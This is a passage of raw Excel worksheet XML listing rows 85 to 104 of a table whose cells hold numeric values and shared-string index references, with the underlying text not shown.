      <c r="R85" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S85" s="12" t="s">
        <v>814</v>
      </c>
      <c r="T85" s="12" t="s">
        <v>19</v>
      </c>
      <c r="U85" s="12" t="s">
        <v>568</v>
      </c>
      <c r="V85" s="12" t="s">
        <v>117</v>
      </c>
      <c r="W85" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X85" s="12">
        <v>3</v>
      </c>
      <c r="Y85" s="12" t="s">
        <v>841</v>
      </c>
    </row>
    <row r="86" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A86" s="12">
        <v>326</v>
      </c>
      <c r="B86" s="12" t="s">
        <v>28422</v>
      </c>
      <c r="C86" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D86" s="12" t="s">
        <v>28423</v>
      </c>
      <c r="F86" s="12" t="s">
        <v>29733</v>
      </c>
      <c r="G86" s="12" t="s">
        <v>847</v>
      </c>
      <c r="H86" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I86" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J86" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K86" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L86" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M86" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N86" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O86" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P86" s="12" t="s">
        <v>848</v>
      </c>
      <c r="Q86" s="12">
        <v>2.5</v>
      </c>
      <c r="R86" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S86" s="12" t="s">
        <v>849</v>
      </c>
      <c r="T86" s="12" t="s">
        <v>112</v>
      </c>
      <c r="U86" s="12" t="s">
        <v>568</v>
      </c>
      <c r="V86" s="12" t="s">
        <v>130</v>
      </c>
      <c r="W86" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X86" s="12">
        <v>3</v>
      </c>
      <c r="Y86" s="12" t="s">
        <v>850</v>
      </c>
    </row>
    <row r="87" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A87" s="12">
        <v>331</v>
      </c>
      <c r="B87" s="12" t="s">
        <v>28417</v>
      </c>
      <c r="C87" s="12" t="s">
        <v>28424</v>
      </c>
      <c r="D87" s="12" t="s">
        <v>28425</v>
      </c>
      <c r="E87" s="12" t="s">
        <v>31437</v>
      </c>
      <c r="F87" s="12" t="s">
        <v>29733</v>
      </c>
      <c r="G87" s="12" t="s">
        <v>857</v>
      </c>
      <c r="H87" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I87" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J87" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K87" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L87" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M87" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N87" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O87" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P87" s="12" t="s">
        <v>858</v>
      </c>
      <c r="Q87" s="12">
        <v>2.5</v>
      </c>
      <c r="R87" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S87" s="12" t="s">
        <v>859</v>
      </c>
      <c r="T87" s="12" t="s">
        <v>68</v>
      </c>
      <c r="U87" s="12" t="s">
        <v>860</v>
      </c>
      <c r="V87" s="12" t="s">
        <v>622</v>
      </c>
      <c r="W87" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X87" s="12">
        <v>10</v>
      </c>
      <c r="Y87" s="12" t="s">
        <v>861</v>
      </c>
    </row>
    <row r="88" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A88" s="12">
        <v>349</v>
      </c>
      <c r="B88" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D88" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F88" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G88" s="12" t="s">
        <v>918</v>
      </c>
      <c r="H88" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I88" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J88" s="12" t="s">
        <v>302</v>
      </c>
      <c r="K88" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L88" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M88" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N88" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O88" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P88" s="12" t="s">
        <v>919</v>
      </c>
      <c r="Q88" s="12">
        <v>2.5</v>
      </c>
      <c r="R88" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S88" s="12" t="s">
        <v>920</v>
      </c>
      <c r="T88" s="12" t="s">
        <v>921</v>
      </c>
      <c r="U88" s="12" t="s">
        <v>922</v>
      </c>
      <c r="V88" s="12" t="s">
        <v>167</v>
      </c>
      <c r="W88" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X88" s="12">
        <v>5</v>
      </c>
      <c r="Y88" s="12" t="s">
        <v>923</v>
      </c>
    </row>
    <row r="89" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A89" s="12">
        <v>356</v>
      </c>
      <c r="B89" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C89" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D89" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F89" s="12" t="s">
        <v>29733</v>
      </c>
      <c r="G89" s="12" t="s">
        <v>942</v>
      </c>
      <c r="H89" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I89" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J89" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K89" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L89" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M89" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N89" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O89" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P89" s="12" t="s">
        <v>943</v>
      </c>
      <c r="Q89" s="12">
        <v>2.5</v>
      </c>
      <c r="R89" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S89" s="12" t="s">
        <v>944</v>
      </c>
      <c r="T89" s="12" t="s">
        <v>68</v>
      </c>
      <c r="U89" s="12" t="s">
        <v>945</v>
      </c>
      <c r="V89" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W89" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X89" s="12">
        <v>5</v>
      </c>
      <c r="Y89" s="12" t="s">
        <v>946</v>
      </c>
    </row>
    <row r="90" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A90" s="12">
        <v>359</v>
      </c>
      <c r="B90" s="12" t="s">
        <v>28432</v>
      </c>
      <c r="C90" s="12" t="s">
        <v>29780</v>
      </c>
      <c r="D90" s="12" t="s">
        <v>28429</v>
      </c>
      <c r="F90" s="12" t="s">
        <v>29739</v>
      </c>
      <c r="G90" s="12" t="s">
        <v>951</v>
      </c>
      <c r="H90" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I90" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J90" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K90" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L90" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M90" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N90" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O90" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P90" s="12" t="s">
        <v>952</v>
      </c>
      <c r="Q90" s="12">
        <v>2.5</v>
      </c>
      <c r="R90" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S90" s="12" t="s">
        <v>953</v>
      </c>
      <c r="T90" s="12" t="s">
        <v>46</v>
      </c>
      <c r="U90" s="12" t="s">
        <v>954</v>
      </c>
      <c r="V90" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W90" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X90" s="12">
        <v>5</v>
      </c>
      <c r="Y90" s="12" t="s">
        <v>955</v>
      </c>
    </row>
    <row r="91" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A91" s="12">
        <v>363</v>
      </c>
      <c r="B91" s="12" t="s">
        <v>28426</v>
      </c>
      <c r="C91" s="12" t="s">
        <v>28427</v>
      </c>
      <c r="D91" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F91" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G91" s="12" t="s">
        <v>962</v>
      </c>
      <c r="H91" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I91" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J91" s="12" t="s">
        <v>963</v>
      </c>
      <c r="K91" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L91" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M91" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N91" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O91" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P91" s="12" t="s">
        <v>952</v>
      </c>
      <c r="Q91" s="12">
        <v>2.5</v>
      </c>
      <c r="R91" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S91" s="12" t="s">
        <v>964</v>
      </c>
      <c r="T91" s="12" t="s">
        <v>965</v>
      </c>
      <c r="U91" s="12" t="s">
        <v>966</v>
      </c>
      <c r="V91" s="12" t="s">
        <v>202</v>
      </c>
      <c r="W91" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X91" s="12">
        <v>4</v>
      </c>
      <c r="Y91" s="12" t="s">
        <v>967</v>
      </c>
    </row>
    <row r="92" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A92" s="12">
        <v>364</v>
      </c>
      <c r="B92" s="12" t="s">
        <v>28428</v>
      </c>
      <c r="C92" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D92" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E92" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F92" s="12" t="s">
        <v>29740</v>
      </c>
      <c r="G92" s="12" t="s">
        <v>968</v>
      </c>
      <c r="H92" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I92" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J92" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K92" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L92" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M92" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N92" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O92" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P92" s="12" t="s">
        <v>952</v>
      </c>
      <c r="Q92" s="12">
        <v>2.5</v>
      </c>
      <c r="R92" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S92" s="12" t="s">
        <v>969</v>
      </c>
      <c r="T92" s="12" t="s">
        <v>19</v>
      </c>
      <c r="U92" s="12" t="s">
        <v>970</v>
      </c>
      <c r="V92" s="12" t="s">
        <v>19</v>
      </c>
      <c r="W92" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X92" s="12">
        <v>4</v>
      </c>
      <c r="Y92" s="12" t="s">
        <v>971</v>
      </c>
    </row>
    <row r="93" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A93" s="12">
        <v>365</v>
      </c>
      <c r="B93" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C93" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D93" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F93" s="12" t="s">
        <v>29733</v>
      </c>
      <c r="G93" s="12" t="s">
        <v>972</v>
      </c>
      <c r="H93" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I93" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J93" s="12" t="s">
        <v>302</v>
      </c>
      <c r="K93" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L93" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M93" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N93" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O93" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P93" s="12" t="s">
        <v>952</v>
      </c>
      <c r="Q93" s="12">
        <v>2.5</v>
      </c>
      <c r="R93" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S93" s="12" t="s">
        <v>973</v>
      </c>
      <c r="T93" s="12" t="s">
        <v>974</v>
      </c>
      <c r="U93" s="12" t="s">
        <v>975</v>
      </c>
      <c r="V93" s="12" t="s">
        <v>167</v>
      </c>
      <c r="W93" s="12">
        <v>613</v>
      </c>
      <c r="X93" s="12">
        <v>5</v>
      </c>
      <c r="Y93" s="12" t="s">
        <v>976</v>
      </c>
    </row>
    <row r="94" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A94" s="12">
        <v>374</v>
      </c>
      <c r="B94" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D94" s="12" t="s">
        <v>28430</v>
      </c>
      <c r="E94" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F94" s="12" t="s">
        <v>29741</v>
      </c>
      <c r="G94" s="12" t="s">
        <v>1000</v>
      </c>
      <c r="H94" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I94" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J94" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K94" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L94" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M94" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N94" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O94" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P94" s="12" t="s">
        <v>1001</v>
      </c>
      <c r="Q94" s="12">
        <v>2.5</v>
      </c>
      <c r="R94" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S94" s="12" t="s">
        <v>1002</v>
      </c>
      <c r="T94" s="12" t="s">
        <v>1003</v>
      </c>
      <c r="U94" s="12" t="s">
        <v>1004</v>
      </c>
      <c r="V94" s="12" t="s">
        <v>117</v>
      </c>
      <c r="W94" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X94" s="12">
        <v>3</v>
      </c>
      <c r="Y94" s="12" t="s">
        <v>1005</v>
      </c>
    </row>
    <row r="95" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A95" s="12">
        <v>375</v>
      </c>
      <c r="B95" s="12" t="s">
        <v>28431</v>
      </c>
      <c r="D95" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E95" s="12" t="s">
        <v>31446</v>
      </c>
      <c r="F95" s="12" t="s">
        <v>29742</v>
      </c>
      <c r="G95" s="12" t="s">
        <v>1006</v>
      </c>
      <c r="H95" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I95" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J95" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K95" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L95" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M95" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N95" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O95" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P95" s="12" t="s">
        <v>1001</v>
      </c>
      <c r="Q95" s="12">
        <v>2.5</v>
      </c>
      <c r="R95" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S95" s="12" t="s">
        <v>1007</v>
      </c>
      <c r="T95" s="12" t="s">
        <v>622</v>
      </c>
      <c r="U95" s="12" t="s">
        <v>1008</v>
      </c>
      <c r="V95" s="12" t="s">
        <v>622</v>
      </c>
      <c r="W95" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X95" s="12">
        <v>3</v>
      </c>
      <c r="Y95" s="12" t="s">
        <v>1009</v>
      </c>
    </row>
    <row r="96" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A96" s="12">
        <v>386</v>
      </c>
      <c r="B96" s="12" t="s">
        <v>28433</v>
      </c>
      <c r="C96" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D96" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F96" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G96" s="12" t="s">
        <v>1032</v>
      </c>
      <c r="H96" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I96" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J96" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K96" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L96" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M96" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N96" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O96" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P96" s="12" t="s">
        <v>1033</v>
      </c>
      <c r="Q96" s="12">
        <v>2.5</v>
      </c>
      <c r="R96" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S96" s="12" t="s">
        <v>1034</v>
      </c>
      <c r="T96" s="12" t="s">
        <v>622</v>
      </c>
      <c r="U96" s="12" t="s">
        <v>1035</v>
      </c>
      <c r="V96" s="12" t="s">
        <v>602</v>
      </c>
      <c r="W96" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X96" s="12">
        <v>7</v>
      </c>
      <c r="Y96" s="12" t="s">
        <v>1036</v>
      </c>
    </row>
    <row r="97" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A97" s="12">
        <v>387</v>
      </c>
      <c r="B97" s="12" t="s">
        <v>28434</v>
      </c>
      <c r="C97" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D97" s="12" t="s">
        <v>28425</v>
      </c>
      <c r="E97" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F97" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G97" s="12" t="s">
        <v>1037</v>
      </c>
      <c r="H97" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I97" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J97" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K97" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L97" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M97" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N97" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O97" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P97" s="12" t="s">
        <v>863</v>
      </c>
      <c r="Q97" s="12">
        <v>2.5</v>
      </c>
      <c r="R97" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S97" s="12" t="s">
        <v>1038</v>
      </c>
      <c r="T97" s="12" t="s">
        <v>1039</v>
      </c>
      <c r="U97" s="12" t="s">
        <v>1040</v>
      </c>
      <c r="V97" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W97" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X97" s="12">
        <v>7</v>
      </c>
      <c r="Y97" s="12" t="s">
        <v>1041</v>
      </c>
    </row>
    <row r="98" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A98" s="12">
        <v>388</v>
      </c>
      <c r="B98" s="12" t="s">
        <v>28435</v>
      </c>
      <c r="D98" s="12" t="s">
        <v>28436</v>
      </c>
      <c r="F98" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G98" s="12" t="s">
        <v>1042</v>
      </c>
      <c r="H98" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I98" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J98" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K98" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L98" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M98" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N98" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O98" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P98" s="12" t="s">
        <v>863</v>
      </c>
      <c r="Q98" s="12">
        <v>2.5</v>
      </c>
      <c r="R98" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S98" s="12" t="s">
        <v>1043</v>
      </c>
      <c r="T98" s="12" t="s">
        <v>1039</v>
      </c>
      <c r="U98" s="12" t="s">
        <v>1044</v>
      </c>
      <c r="V98" s="12" t="s">
        <v>93</v>
      </c>
      <c r="W98" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X98" s="12">
        <v>2</v>
      </c>
      <c r="Y98" s="12" t="s">
        <v>1045</v>
      </c>
    </row>
    <row r="99" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A99" s="12">
        <v>390</v>
      </c>
      <c r="B99" s="12" t="s">
        <v>28438</v>
      </c>
      <c r="C99" s="12" t="s">
        <v>28439</v>
      </c>
      <c r="D99" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F99" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G99" s="12" t="s">
        <v>1046</v>
      </c>
      <c r="H99" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I99" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J99" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K99" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L99" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M99" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N99" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O99" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P99" s="12" t="s">
        <v>1001</v>
      </c>
      <c r="Q99" s="12">
        <v>2.5</v>
      </c>
      <c r="R99" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S99" s="12" t="s">
        <v>1047</v>
      </c>
      <c r="T99" s="12" t="s">
        <v>1048</v>
      </c>
      <c r="U99" s="12" t="s">
        <v>1049</v>
      </c>
      <c r="V99" s="12" t="s">
        <v>114</v>
      </c>
      <c r="W99" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X99" s="12">
        <v>3</v>
      </c>
      <c r="Y99" s="12" t="s">
        <v>1050</v>
      </c>
    </row>
    <row r="100" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A100" s="12">
        <v>392</v>
      </c>
      <c r="B100" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D100" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F100" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G100" s="12" t="s">
        <v>1056</v>
      </c>
      <c r="H100" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I100" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J100" s="12" t="s">
        <v>23</v>
      </c>
      <c r="K100" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L100" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M100" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N100" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O100" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P100" s="12" t="s">
        <v>1001</v>
      </c>
      <c r="Q100" s="12">
        <v>2.5</v>
      </c>
      <c r="R100" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S100" s="12" t="s">
        <v>1057</v>
      </c>
      <c r="T100" s="12" t="s">
        <v>656</v>
      </c>
      <c r="U100" s="12" t="s">
        <v>1058</v>
      </c>
      <c r="V100" s="12" t="s">
        <v>117</v>
      </c>
      <c r="W100" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X100" s="12">
        <v>2</v>
      </c>
      <c r="Y100" s="12" t="s">
        <v>1059</v>
      </c>
    </row>
    <row r="101" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A101" s="12">
        <v>393</v>
      </c>
      <c r="B101" s="12" t="s">
        <v>28440</v>
      </c>
      <c r="C101" s="12" t="s">
        <v>28437</v>
      </c>
      <c r="D101" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E101" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F101" s="12" t="s">
        <v>29738</v>
      </c>
      <c r="G101" s="12" t="s">
        <v>1060</v>
      </c>
      <c r="H101" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I101" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J101" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K101" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L101" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M101" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N101" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O101" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P101" s="12" t="s">
        <v>1001</v>
      </c>
      <c r="Q101" s="12">
        <v>2.5</v>
      </c>
      <c r="R101" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S101" s="12" t="s">
        <v>1061</v>
      </c>
      <c r="T101" s="12" t="s">
        <v>656</v>
      </c>
      <c r="U101" s="12" t="s">
        <v>1062</v>
      </c>
      <c r="V101" s="12" t="s">
        <v>117</v>
      </c>
      <c r="W101" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X101" s="12">
        <v>4</v>
      </c>
      <c r="Y101" s="12" t="s">
        <v>1063</v>
      </c>
    </row>
    <row r="102" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A102" s="12">
        <v>401</v>
      </c>
      <c r="B102" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C102" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D102" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F102" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G102" s="12" t="s">
        <v>1069</v>
      </c>
      <c r="H102" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I102" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J102" s="12" t="s">
        <v>182</v>
      </c>
      <c r="K102" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L102" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M102" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N102" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O102" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P102" s="12" t="s">
        <v>1065</v>
      </c>
      <c r="Q102" s="12">
        <v>2.5</v>
      </c>
      <c r="R102" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S102" s="12" t="s">
        <v>1070</v>
      </c>
      <c r="T102" s="12" t="s">
        <v>68</v>
      </c>
      <c r="U102" s="12" t="s">
        <v>1071</v>
      </c>
      <c r="V102" s="12" t="s">
        <v>400</v>
      </c>
      <c r="W102" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X102" s="12">
        <v>1</v>
      </c>
      <c r="Y102" s="12" t="s">
        <v>1072</v>
      </c>
    </row>
    <row r="103" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A103" s="12">
        <v>404</v>
      </c>
      <c r="B103" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D103" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F103" s="12" t="s">
        <v>29726</v>
      </c>
      <c r="G103" s="12" t="s">
        <v>1073</v>
      </c>
      <c r="H103" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I103" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J103" s="12" t="s">
        <v>458</v>
      </c>
      <c r="K103" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L103" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M103" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N103" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O103" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P103" s="12" t="s">
        <v>1065</v>
      </c>
      <c r="Q103" s="12">
        <v>2.5</v>
      </c>
      <c r="R103" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S103" s="12" t="s">
        <v>1074</v>
      </c>
      <c r="T103" s="12" t="s">
        <v>68</v>
      </c>
      <c r="U103" s="12" t="s">
        <v>1075</v>
      </c>
      <c r="V103" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W103" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X103" s="12">
        <v>1</v>
      </c>
      <c r="Y103" s="12" t="s">
        <v>1076</v>
      </c>
    </row>
    <row r="104" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A104" s="12">
        <v>407</v>
      </c>
      <c r="B104" s="12" t="s">
        <v>28441</v>
      </c>
      <c r="D104" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F104" s="12" t="s">
        <v>29733</v>
      </c>
      <c r="G104" s="12" t="s">
        <v>1077</v>
      </c>
      <c r="H104" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I104" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J104" s="12" t="s">
        <v>146</v>
      </c>
      <c r="K104" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L104" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M104" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N104" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O104" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P104" s="12" t="s">
        <v>1078</v>
      </c>
